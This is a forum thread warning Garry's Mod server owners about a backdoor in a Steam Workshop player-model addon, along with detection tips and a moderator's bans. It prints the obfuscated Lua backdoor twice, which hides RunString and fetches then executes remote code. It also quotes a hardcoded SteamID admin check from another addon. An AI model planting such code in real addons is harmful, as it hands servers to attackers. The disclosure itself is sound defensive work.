[PSA] Backdoor Found in "Suits and Robbers Player Models" Workshop Addon
93 replies, posted
[QUOTE=_Divine;47357575]My gut tells me it's some sort of backdoor in a workshop addon, but maybe I'm just cynical.[/QUOTE]
Looks like the cynical part of me was right...
Found in the addon: [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=274555791[/URL]
[CODE]local rstr=_G["Ru".."nStr".."ing"];RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);[/CODE]
There's no telling what this guy might've done to servers. I doubt there was no malicious intent, considering that he wanted to keep this hidden as well as his two VAC bans:
[URL="http://steamcommunity.com/id/procrastinatorsal"]http://steamcommunity.com/profiles/76561198067739267[/URL]
I'd recommend removing this addon or extract it and remove the backdoor code (in autorun/server/resource.lua). In the future, he might update the broken link as he very well might've in the past: [URL]http://steamcommunity.com/sharedfiles/filedetails/changelog/274555791[/URL]
[U]What I did to find it and how you can check on your own:[/U]
1. Made a batch script to mass extract .gma files:
[CODE]for %%G in (*.gma) do ( "location to gmad.exe" extract -file "%%G" )[/CODE]
2. Saved it in the root of the addons folder.
3. Searched for http.post & http.fetch
There's also one in the No Lag Textscreens that keeps getting reuploaded everywhere.
The puush was deleted, so I guess it's all good until the addon is updated.
That might be the cause of some people having the error Run string 'puush'
[QUOTE=PwndKilled;47372722]That might be the cause of some people having the error Run string 'puush'[/QUOTE]
Yeah, it was, as it was [URL="http://facepunch.com/showthread.php?p=47357575"]this thread[/URL] that led me to investigate further.
I take it that it requires a certain number of people to report it on the workshop before it gets taken down?
Edit: does his other addons he's uploaded contain back doors?
[QUOTE=code_gs;47372509]There's also one in the No Lag Textscreens that keeps getting reuploaded everywhere.[/QUOTE]
This and the addon from OP are now banned. I tried another addon from [url]http://steamcommunity.com/id/procrastinatorsal[/url] and I didn't find any backdoors in it.
[QUOTE=Robotboy655;47372884]This and the addon from OP are now banned. I tried another addon from [URL]http://steamcommunity.com/id/procrastinatorsal[/URL] and I didn't find any backdoors in it.[/QUOTE]
Yay, thanks! Although, there were over 60k subscribers to the addon and countless servers use them.
Getting ready for these:
[IMG]http://cdn.auroraen.com/image/1a3Y1Q3p2o10/Image 2015-03-22 at 3.43.56 AM.png[/IMG]
I hope this is not breaking any rules or anything, but here's the content w/ the backdoor removed if any server owners need it.
[URL]http://cdn.auroraen.com/0d2d1Q0E2J2V/suitsandrobbers.zip[/URL]
Is it against the rules to have backdoors? If not, it should be.
[QUOTE=Baron von Hax;47373234]Is it against the rules to have backdoors? If not, it should be.[/QUOTE]
[url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url]
[QUOTE=Robotboy655;47373295][url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url][/QUOTE]
[quote=GarrysModWikiRulesForAddons]
Avoid requiring other addons - In some cases this is permissible - like if it's an addon for a gamemode. But making a weapon that requires another weapon to function is not allowed. If your addon does require another addon - it shouldn't error if that addon isn't present. It should just do nothing.
[/quote]
Soooo, what about the M9K weapon addons and such? Does it count for weapon bases?
M9k has the weapons included. However addons like WAC (?) and gbombs which (both) require a base addon, would violate these rule. Always wondered about this rule, but never bothered to ask.
The wording of it makes it sound like a guideline rather than a hard rule.
Thanks for reporting that ^^
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=409961186[/url]
This script also has exactly the same backdoor.
[editline]22nd March 2015[/editline]
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=408243366[/url]
[code]
function fnafgmcheckadmin(pl)
if (pl:SteamID()=="STEAM_0:1:18280147" or pl:SteamID()=="STEAM_0:1:35715092" or pl:SteamID()=="STEAM_0:1:51964687") then
return true
end
return false
end
[/code]
Doesn't surprise me Defcon is involved...
Or that there is a FNAF gamemode with malicious code
[QUOTE=edgarasf123;47373896][url]http://steamcommunity.com/sharedfiles/filedetails/?id=409961186[/url]
This script also has exactly the same backdoor.
[/QUOTE]
That addon is just the suits and robbers pack and another pack in one. Isn't that against the rules itself?
Edit: It just got banned.
[QUOTE=PwndKilled;47372722]That might be the cause of some people having the error Run string 'puush'[/QUOTE]
Oh shit some guy reported that problem and blamed my Addon
[QUOTE=_Divine;47372486]Looks like the cynical part of me was right...
Found in the addon: [URL]http://steamcommunity.com/sharedfiles/filedetails/?id=274555791[/URL]
[CODE]local rstr=_G["Ru".."nStr".."ing"];RSTR=RSTR||rstr;
local htf=http.Fetch;
HTF=HTF||htf;
timer.Simple(5, function()
htf("http://puu.sh/gtnOX/57dc004931.txt",function(c)rstr(c)end);
end);[/CODE]
There's no telling what this guy might've done to servers. I doubt there was no malicious intent, considering that he wanted to keep this hidden as well as his two VAC bans:
[URL="http://steamcommunity.com/id/procrastinatorsal"]http://steamcommunity.com/profiles/76561198067739267[/URL]
I'd recommend removing this addon or extract it and remove the backdoor code (in autorun/server/resource.lua). In the future, he might update the broken link as he very well might've in the past: [URL]http://steamcommunity.com/sharedfiles/filedetails/changelog/274555791[/URL]
[U]What I did to find it and how you can check on your own:[/U]
1. Made a batch script to mass extract .gma files:
[CODE]for %%G in (*.gma) do ( "location to gmad.exe" extract -file "%%G" )[/CODE]
2. Saved it in the root of the addons folder.
3. Searched for http.post & http.fetch[/QUOTE]
Tisk Tisk. Naughty kids.
[QUOTE=Robotboy655;47373295][url]http://wiki.garrysmod.com/page/Steam_Workshop_Rules#Addons[/url][/QUOTE]
[quote]Your submission must not contain pornographic content. (e.g. pornographic sprays/decals, nudity)[/quote]
Does a Drilldo fall under this category?
[QUOTE=code_gs;47374840]Does a Drilldo fall under this category?[/QUOTE]
It does.
[QUOTE=Robotboy655;47374902]It does.[/QUOTE]
Fuck
[QUOTE=Robotboy655;47374902]It does.[/QUOTE]
[url]http://steamcommunity.com/workshop/browse/?appid=4000&searchtext=dildo&childpublishedfileid=0&browsesort=textsearch§ion=readytouseitems[/url]
164 dildos, you're going to have a busy day :quagmire:.
I am not going to ban non reported dupes/saves, it will take me a full day to ban 160 dildo saves and 300 sex dupes.
Workshop moderation tools kind of SUCK A HELLA LOT.
What about all these spam guides that keep being made that have nothing to do with Garry's Mod.
[QUOTE=Robotboy655;47375223]300 sex dupes.[/QUOTE]
I think you are lowballing how many exist
[QUOTE=The Commander;47375539]What about all these spam guides that keep being made that have nothing to do with Garry's Mod.[/QUOTE]
Report them.
[editline]22nd March 2015[/editline]
Guides are even worse because Valve does not use <a> for guide links, so I can even mass open the pages using Middle mouse click.
Oh lord.
And i was thinking what's casuing the puu.sh error on every server start.
Glad you found it.
[QUOTE=Robotboy655;47375223]I am not going to ban non reported dupes/saves, it will take me a full day to ban 160 dildo saves and 300 sex dupes.
Workshop moderation tools kind of SUCK A HELLA LOT.[/QUOTE]
Surely when you click on "ban" it gives you a link with the id?
Why not farm the ids and make a Lua script, or GreaseMonkey script or something else which lets you mass ban or mark x to ban which saves to a file, and when you click on ban selected it reads the txt, bans and saves them in a banned folder?
Sorry, you need to Log In to post a reply to this thread.
